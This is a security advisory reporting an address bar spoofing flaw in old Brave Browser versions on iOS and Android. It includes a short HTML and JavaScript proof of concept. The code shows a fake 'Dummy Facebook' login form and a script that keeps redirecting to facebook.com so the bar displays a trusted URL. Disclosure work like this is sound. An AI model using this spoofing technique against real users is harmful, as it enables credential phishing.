Brave Browser Address Bar Spoofing Vulnerability iOS + Android
Posted on 30 November -0001
<HTML><HEAD><TITLE>Brave Browser Address Bar Spoofing Vulnerability ( iOS + Android ) </TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Hello, I am Aaditya Purani, I would like to Report Address Bar spoofing vulnerability in Brave Browser on the IOS as well as Android Platform. All the Test have been carried out against Latest Brave Browser whose versions i have mentioned in Products affected section. Summary: Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar spoofing is a critical vulnerability in which any attacker can spoof the address bar to a legit looking website but the content of the web-page remains different from the Address-Bar display of the site. In Simple words, the victim sees a familiar looking URL but the content is not from the same URL but the attacker controlled content. Some companies say "We recognize that the address bar is the only reliable security indicator in modern browsers" . Products affected: In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10) In Android - Affected in Brave Latest version 1.9.56 Exploit Code: <html> <title>Address Bar spoofing Brave</title> <h1> This is Dummy Facebook </h1> <form> Email: <input type="text" name="username" placeholder="add email"><br> Password: <input type="text" name="password" placeholder="pass"> <script> function f() { location = "https://facebook.com" } setInterval("f()", 10); </script> </html> Credits: Aaditya Purani Contact : https://aadityapurani.com https://twitter.com/aaditya_purani Proof Of Concept: https://hackerone.com/reports/175958 With Kind Regards Aaditya Purani </BODY></HTML>